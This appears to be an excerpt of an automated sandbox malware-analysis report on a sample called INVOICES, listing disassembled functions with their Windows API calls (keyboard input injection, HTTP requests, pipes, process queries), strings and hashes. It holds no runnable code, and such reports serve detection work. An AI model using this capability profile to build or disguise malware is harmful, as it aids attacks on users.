                                                                                                                                  Function 00790F42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00790F97
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00790FB3
                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00791012
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00791064
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID: MZER
                                                                                                                                  • API String ID: 432972143-2424380061
                                                                                                                                  • Opcode ID: c9d10ec27f2430657c0be755c980e09dcfd6f2cc5dbd0cda8342e771ad577bb4
                                                                                                                                  • Instruction ID: a0c05d79b37944a3e2e3b4b9dc706be21b9af32ec9574f450cf32239d13424b9
                                                                                                                                  • Opcode Fuzzy Hash: c9d10ec27f2430657c0be755c980e09dcfd6f2cc5dbd0cda8342e771ad577bb4
                                                                                                                                  • Instruction Fuzzy Hash: A2313C30A40689DEFF348F28AC08BFA7B76BF45711F44431AE495521D1D37E49E197A1
                                                                                                                                  Function 007AD8B9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007AD8D9
                                                                                                                                    • Part of subcall function 007379AB: _memmove.LIBCMT ref: 007379F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower_memmove
                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                  • API String ID: 3425801089-567219261
                                                                                                                                  • Opcode ID: 3dc8c94e4b14a4f42142e52112563aef06a160bae0e4b502c7526049d4a34b51
                                                                                                                                  • Instruction ID: 779b235ed021d301f001d825d978966d8788c0adf14b08eabe04d7b7d87d7307
                                                                                                                                  • Opcode Fuzzy Hash: 3dc8c94e4b14a4f42142e52112563aef06a160bae0e4b502c7526049d4a34b51
                                                                                                                                  • Instruction Fuzzy Hash: C731ABB1500615EBCF24EF54C8949EEB3B4FF46320B10872AE866976D2DB79ED05CB80
                                                                                                                                  Function 00789152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007891D6
                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007891E9
                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00789219
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 365058703-1403004172
                                                                                                                                  • Opcode ID: 5ca8efd3368cabffbe648cf8d936e8073eb36f00d4deb3f8179d59b66f526f02
                                                                                                                                  • Instruction ID: c4a027383605ccb4aa93fb944d6d8c4ee3e33af528426a185db2be557806bcef
                                                                                                                                  • Opcode Fuzzy Hash: 5ca8efd3368cabffbe648cf8d936e8073eb36f00d4deb3f8179d59b66f526f02
                                                                                                                                  • Instruction Fuzzy Hash: 87210171A44108BAEB18BB65CC8EDFEB768EF45320F14422AF925971E1DB3D1D0AD710
                                                                                                                                  Function 0073410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0076D51C
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • _memset.LIBCMT ref: 0073418D
                                                                                                                                  • _wcscpy.LIBCMT ref: 007341E1
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007341F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                  • Opcode ID: 59afb548ec016d9ec5d6ce00ea7fe7c55730aa56a6d996e82e1899dc5ad23d17
                                                                                                                                  • Instruction ID: 2de087bf403ff50eb55a22b6b185f36c855f276067fe087a0e840dca575dd1a2
                                                                                                                                  • Opcode Fuzzy Hash: 59afb548ec016d9ec5d6ce00ea7fe7c55730aa56a6d996e82e1899dc5ad23d17
                                                                                                                                  • Instruction Fuzzy Hash: 3B31A6B1408708AAE735EB60DC4ABEB77E8BF44304F10461AF68592193EB7C6648C797
                                                                                                                                  Function 007A1943 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007A1962
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007A1988
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007A19B8
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 007A19FF
                                                                                                                                    • Part of subcall function 007A2599: GetLastError.KERNEL32(?,?,007A192D,00000000,00000000,00000001), ref: 007A25AE
                                                                                                                                    • Part of subcall function 007A2599: SetEvent.KERNEL32(?,?,007A192D,00000000,00000000,00000001), ref: 007A25C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                                  • Opcode ID: a8b19039cf53b9df98d47bc01b419322e92ff1f74863bfe71bb0caa8e392d682
                                                                                                                                  • Instruction ID: d8afd0647858f8a85e36e27bd1c244e17f09c0746f9e5f95d67a2b65969775e3
                                                                                                                                  • Opcode Fuzzy Hash: a8b19039cf53b9df98d47bc01b419322e92ff1f74863bfe71bb0caa8e392d682
                                                                                                                                  • Instruction Fuzzy Hash: 3E21C2B2500208BFF7119F64DC99EBF77ACEB8AB44F50821AF40592140EB289E0597A5
                                                                                                                                  Function 007B6419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
                                                                                                                                    • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
                                                                                                                                    • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007B6493
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 007B649A
                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007B64AF
                                                                                                                                  • DestroyWindow.USER32(?), ref: 007B64B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                  • Opcode ID: 18c587c54d94da24a6c97a439ef639756804b8f5684ef7332fb378737b098db0
                                                                                                                                  • Instruction ID: 50041e9e890f96c4be2741ebc29d01a53e571058b5fb555e40610f8ea47bf4a6
                                                                                                                                  • Opcode Fuzzy Hash: 18c587c54d94da24a6c97a439ef639756804b8f5684ef7332fb378737b098db0
                                                                                                                                  • Instruction Fuzzy Hash: 1621B8B1200A45ABEF204FA4DC80FFA77A9EB49764F108629FB1492190C73DCD419760
                                                                                                                                  Function 00796E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00796E65
                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00796E98
                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00796EAA
                                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00796EE4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                  • String ID: nul
                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                  • Opcode ID: a680ad9688dcdd61b65eb95cc659f1226a839d7190e7b3cc717013cb4eab795d
                                                                                                                                  • Instruction ID: 5b786ef81957bc10577c33544682a79c9d8b1a372c6c2f27038fe195d91f811f
                                                                                                                                  • Opcode Fuzzy Hash: a680ad9688dcdd61b65eb95cc659f1226a839d7190e7b3cc717013cb4eab795d
                                                                                                                                  • Instruction Fuzzy Hash: C3218378600205ABDF209F39EC05A9A7BF4BF44720F208B29FCA0D72D0DB789850CB54
                                                                                                                                  Function 00796F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00796F32
                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00796F64
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00796F75
                                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00796FAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                  • String ID: nul
                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                  • Opcode ID: f7d7870fa1a64a52b364afa8ff18a625114d3a5524fb890db674e6ec8391a9bf
                                                                                                                                  • Instruction ID: 8a54a763894f1ee1d5b60697617e8fbb626da62a901f12d3baf37050e650e9c2
                                                                                                                                  • Opcode Fuzzy Hash: f7d7870fa1a64a52b364afa8ff18a625114d3a5524fb890db674e6ec8391a9bf
                                                                                                                                  • Instruction Fuzzy Hash: 5321AF71600305ABDF209F69BC08E9A77E9AF45720F204B59FDA1E72D0D77898508B60
                                                                                                                                  Function 0079ACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0079ACDE
                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0079AD32
                                                                                                                                  • __swprintf.LIBCMT ref: 0079AD4B
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,007BF910), ref: 0079AD89
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                  • String ID: %lu
                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                  • Opcode ID: 45a1f9586e5c2632f28792fc2574dd22f01363a6c373454badbb373521a1f47f
                                                                                                                                  • Instruction ID: 4d7eaa03239742ecff4c28ed9d954f6224a3da8ac52a12586354f4eb191cfc97
                                                                                                                                  • Opcode Fuzzy Hash: 45a1f9586e5c2632f28792fc2574dd22f01363a6c373454badbb373521a1f47f
                                                                                                                                  • Instruction Fuzzy Hash: 08214474600109EFDB10DF59DD89EEE77B8EF49704B008069F509EB252DB75EA41CB61
                                                                                                                                  Function 0078A30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                    • Part of subcall function 0078A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0078A179
                                                                                                                                    • Part of subcall function 0078A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0078A18C
                                                                                                                                    • Part of subcall function 0078A15C: GetCurrentThreadId.KERNEL32 ref: 0078A193
                                                                                                                                    • Part of subcall function 0078A15C: AttachThreadInput.USER32(00000000), ref: 0078A19A
                                                                                                                                  • GetFocus.USER32 ref: 0078A334
                                                                                                                                    • Part of subcall function 0078A1A5: GetParent.USER32(?), ref: 0078A1B3
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0078A37D
                                                                                                                                  • EnumChildWindows.USER32(?,0078A3F5), ref: 0078A3A5
                                                                                                                                  • __swprintf.LIBCMT ref: 0078A3BF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                  • String ID: %s%d
                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                  • Opcode ID: 40c000e8686853ec00271661ade05a25d2e334dd098434458bcea4a15b197135
                                                                                                                                  • Instruction ID: 4ffdcadd67e9a1eb4f7e58e036fc6ecbd8cabfed93a16d8ea568cd7378ee5dfa
                                                                                                                                  • Opcode Fuzzy Hash: 40c000e8686853ec00271661ade05a25d2e334dd098434458bcea4a15b197135
                                                                                                                                  • Instruction Fuzzy Hash: AE11B1B1640209BBEF11BF64DC8AFEA37B8AF48700F004076FE08AA152CA795955CB71
                                                                                                                                  Function 007AEC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007AED1B
                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007AED4B
                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007AEE7E
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 007AEEFF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                  • Opcode ID: cbe8fe7973905e13ae8fc0ff34b279f1f6decca29e55b5cb2bf04f8382bd507c
                                                                                                                                  • Instruction ID: b1f3e7fc78f481ba09b687c563dba2de2cdedebbbb2e12bef57864ce523f7732
                                                                                                                                  • Opcode Fuzzy Hash: cbe8fe7973905e13ae8fc0ff34b279f1f6decca29e55b5cb2bf04f8382bd507c
                                                                                                                                  • Instruction Fuzzy Hash: 108131716043119FE720DF28C84AF6AB7E5AF88B10F14891DF695DB292D6B8AD40CB51
                                                                                                                                  Function 0075558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1559183368-0
                                                                                                                                  • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                                                                                  • Instruction ID: cf078ab5e30691bdce7c7583038f35f2ec73c596330b0c75de0a23a9a1fc3e2b
                                                                                                                                  • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
